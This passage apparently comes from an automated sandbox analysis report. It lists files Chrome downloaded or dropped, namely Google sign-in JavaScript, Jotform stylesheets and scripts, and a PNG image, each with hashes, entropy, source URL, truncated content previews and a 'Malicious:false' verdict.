                                                        Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.xOa=_.z("SD8Jgb",[]);._.$W=function(a,b){if(typeof b==="string")a.Nc(b);else if(b instanceof _.Wp&&b.ia&&b.ia===_.C)b=_.Za(b.sw()),a.empty().append(b);else if(b instanceof _.Va)b=_.Za(b),a.empty().append(b);else if(b instanceof Node)a.empty().append(b);else throw Error("ig");};_.aX=function(a){var b=_.zp(a,"[jsslot]");if(b.size()>0)return b;b=new _.xp([_.Bl("span")]);_.Ap(b,"jsslot","");a.empty().append(b);return b};_.uRb=function(a){return a===null||typeof a==="string"&&_.hj(a)};._.k("SD8Jgb");._.fX=function(a){_.W.call(this,a.Ma);this.Xa=a.controller.Xa;this.qd=a.controllers.qd[0]||null;this.header=a.controller.header;this.nav=a.controller.nav;var b;(b=this.Aa().find("button:not([type])").el())==null||b.setAttribute("type","button")};_.K(_.fX,_.W);_.fX.Ca=function(){return{controller:{Xa:{jsname:"n7vHCb",ctor:_.Wv},header:{jsname:"tJHJj",ctor:_.Wv},nav:{jsname:"DH6Rkf",ct
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):522593
                                                        Entropy (8bit):5.18013837926812
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:305DBAF6A985B3FD1666E9645C2B6EF8
                                                        SHA1:277DD0254A07D59156F0323C52F9FB3FBCA0347D
                                                        SHA-256:6C6148102C89DA346F749074C25E83E9BE285CF23BCCF0AE39F44DC32F312ED4
                                                        SHA-512:FDB9BF2509706755B952568076028CB501F0D4D3178F30576B75E1153B81ED05568834CC7445EDEAE4F90121D7E8D4392C2A2190C5CBDB155D6B5B8509C6D0D5
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://cdn02.jotfor.ms/themes/CSS/5e6b428acc8c4e222d1beb91.css?v=3.3.58633
                                                        Preview:@import "https://cdn.jotfor.ms/fonts/?family=Inter&display=swap";*,:after,:before{box-sizing:border-box}:focus{outline:0}input,select,textarea{outline:0;margin:0;text-align:left}select{-webkit-appearance:none;appearance:none}img{max-width:100%}a{text-decoration:none}textarea::-webkit-resizer{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg width='6' height='6' fill='none' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath fill-rule='evenodd' clip-rule='evenodd' d='M5.852.148a.504.504 0 00-.713 0L.148 5.139a.504.504 0 10.713.713L5.852.861a.504.504 0 000-.713zM5.86 3.14a.48.48 0 00-.68 0L3.142 5.18a.48.48 0 10.68.68L5.86 3.82a.48.48 0 000-.68z' fill='%23C3CAD8'/%3E%3C/svg%3E");background-size:7px;background-repeat:no-repeat;background-position:50%}select::-ms-expand{display:none}button{outline:0}:-ms-input-placeholder{color:#8894ab;font-weight:300;font-family:inherit}::placeholder{color:#8894ab;font-weight:300;font-family:inherit}.form-dropdown.is-active{color:#000}.form-dropdown:
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):6417
                                                        Entropy (8bit):4.728794319759142
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:27F180956774D0ED52C65CEA8E0D4F09
                                                        SHA1:1DB68F34D1D0279D1364261A1DF7790DE6439110
                                                        SHA-256:B4686D1F9905BA4CA42EB7B9E8E595D8CF6E9823EE3079E38791884626365730
                                                        SHA-512:146821D17E0E2E2DDC087DD2A21FFA6B578A2DA254AAD681B070D215F498322FEC7362FCE073697C9B3CDAD1A9A1482F07BA009AAA94B5328940751D05D54D28
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:(function(global, factory) {. if (window.FORM_MODE === 'cardform') return;. typeof exports === "object" && typeof module !== "undefined". ? (module.exports = factory()). : typeof define === "function" && define.amd. ? define(factory). : ((global = global || self), (global.ErrorNavigation = factory()));.})(this, function() { 'use strict';. var state = {. section: null,. current: -1,. errors: [],. scrollToBottomOnClose: true,. };. . function getMessage() {. if (state.errors.length <= 0) {. return JotForm.texts.doneMessage;. }.. var msg="";. if (state.errors.length === 1) {. msg = JotForm.texts.oneError;. }. else{. msg = JotForm.texts.multipleError;. }.. msg = msg.replace('{count}', '<strong>' + state.errors.length + '</strong>');. return msg;. }.. function createNavigation(section) {. var container = document.createElement('div');. container.classList.add('error-navigation-container');. container.style.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (680)
                                                        Category:downloaded
                                                        Size (bytes):3125
                                                        Entropy (8bit):5.413820730547069
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:1240089726F87FCD425191F1E1815F8A
                                                        SHA1:EEC8E84E631213F0DF97E000612A89FDD4691EF4
                                                        SHA-256:7EE3935288F2D9CE7155A71230B02ACDBDAC59B0DBD1C37DE1B2A7FE70DF19BC
                                                        SHA-512:E19B0D9D62063528B64924D5D5437AAA160E4ECC31D8F00812310E4A97B2960376B9133A59977F827B854CEEA88822E76A414E2B3E0D23D9ED7FB3D9B0022D08
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.JG9sCN6tUUY.es5.O/ck=boq-identity.AccountsSignInUi.3MIsG3P-TpE.L.B1.O/am=iDGYyTCNQED8w9OA3oAigZADAAAAAAAAACA2AAAAHgY/d=1/exm=AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,O6y8ed,PHUIyb,PrPYRd,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,eVCnO,f8Gu1e,hc6Ubd,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,niKKCd,njlZCf,oLggrd,oqkvIf,p3hmRc,pxq3x,qPYxq,qmdT9,rmumx,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xBaz7b,xQtZb,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlHtYxI9nnQN2M8ydMS92EuAJ10weg/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=ZwDk9d,RMhBfe"
                                                        Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.k("ZwDk9d");.var VA=function(){_.Qt.call(this)};_.K(VA,_.Uu);VA.Ca=_.Uu.Ca;VA.prototype.oU=function(a){return _.ef(this,{Ya:{gV:_.$l}}).then(function(b){var c=window._wjdd,d=window._wjdc;return!c&&d?new _.Ki(function(e){window._wjdc=function(f){d(f);e(SKa(f,b,a))}}):SKa(c,b,a)})};var SKa=function(a,b,c){return(a=a&&a[c])?a:b.Ya.gV.oU(c)};.VA.prototype.aa=function(a,b){var c=_.ksa(b).Xk;if(c.startsWith("$")){var d=_.bn.get(a);_.Jq[b]&&(d||(d={},_.bn.set(a,d)),d[c]=_.Jq[b],delete _.Jq[b],_.Kq--);if(d)if(a=d[c])b=_.hf(a);else throw Error("Tb`"+b);else b=null}else b=null;return b};_.Vu(_.Tfa,VA);._.l();._.k("SNUn3");._.RKa=new _.wf(_.Jg);._.l();._.k("RMhBfe");.var TKa=function(a){var b=_.Iq(a);return b?new _.Ki(function(c,d){var e=function(){b=_.Iq(a);var f=_.$fa(a,b);f?c(f.getAttribute("jsdata")):window.document.readyState=="complete"?(f=["Unable to find deferred jsdata with i
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (3168), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):3168
                                                        Entropy (8bit):4.96213739645873
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:4821AF91EA69D4B12822A1B7FD116EE1
                                                        SHA1:CF453003E8727081FCF75A1A0E683FB1534E5240
                                                        SHA-256:D4E193083A57FFD9E7CE23B7347A2DD1F63F8D36961301E48F74B52889599C1C
                                                        SHA-512:26C57E5BAEB3A90643F55D2525C422A88C144E20996DAADFC34059289A67333D7C9517A46F41CFB332D9C2C93FBAB542F49499465DEC098C86D159D3AF8D3417
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://cdn01.jotfor.ms/stylebuilder/static/form-common.css?v=63b8091
                                                        Preview:.app.isBuilder .form-all{margin:0 auto 20px!important}.formPage-container .formPage-each:not(:first-of-type) .form-all:before{display:none}.form-cover-wrapper+.form-all{margin-top:0}.form-cover-wrapper+.form-all:before{content:none}.form-cover-wrapper{margin:0 auto 32px;padding-top:32px;position:relative;overflow:hidden;transition:all .33s ease}.form-cover-wrapper.form-page-cover-image-align-left .form-page-cover-image-wrapper{-ms-flex-pack:start;justify-content:flex-start}.form-cover-wrapper.form-page-cover-image-align-center .form-page-cover-image-wrapper{-ms-flex-pack:center;justify-content:center}.form-cover-wrapper.form-page-cover-image-align-right .form-page-cover-image-wrapper{-ms-flex-pack:end;justify-content:flex-end}.form-cover-wrapper .form-page-cover-text{line-height:50px}.form-cover-wrapper .add-form-logo{display:-ms-flexbox;display:flex;background-repeat:no-repeat;border:0;background-color:transparent;padding-block:0;padding-inline:0}.form-page-cover-image-wrapper{width:1
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 288 x 288, 8-bit colormap, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):1730
                                                        Entropy (8bit):7.662945604903849
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:58C4DDE30BC77AB9E25A470AB8C139CB
                                                        SHA1:79C931CB38C0E381FBBAFDE56BD6A792F0D126F5
                                                        SHA-256:974B447701E8F339AE789E6712573F09DDD9006522E26A9C1F193B1202640AD3
                                                        SHA-512:603BCFCF2E58925E8F24E8E42461CA9C18D425875863194024AB073F77A0E256A9035DF05C139C06D795081297DFFBF12CE819376F040898D984455B7AE11463
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:.PNG........IHDR... ... .....#]^.....PLTE....a......)..Q... ....`........Q..7...fm......D...@...k......y..................@.u .....`...........p$.dp..`..0.............GP}......P......................8Ar..P.....u|...6.~0........V_..c$.....IDATx...r.P.....D.N...$.&.f...c....Pb..6i...]....7{.,.B.!..B.!..B.!..B.!..B.!..B.!..B.!.....t......v..,....Q/.WK0G......|.o.K....9.(.|.h.~.@.....S]B{.C.<....==d.>8d.>E..u..`..|.r..}..h...3f.S..}..^.l|..i.W.VQ{.......v:.~..?wH]...>...j-mD..%.pr'..........IM........$..r]myl-R....V.4@..gQ..7!.....v>EK....?...R.O{;.?..)..,}f.>E.w3K.?d}.....?B.>.p....z[....,%.Y..X..g..'.....h.......D.x...,.y..0..#Y....$.G..@.Q..@.Q.D.I_.E.xOHJ2}.+..P.1w.P.1?X..xB.k.......#d........x......Y.....$.G.......>|....n....|...>l]....|.F..K......|....K......>...".T..._...K..M....>|9|*J..w..........>|=.T4.OEs....|.......,.......|.z......F..E#.O.....E.#....^&Q.|v...>l........>....?....>l......v....C...'.E../Ik..|..qP.......|N....c.W..
                                                        No static file info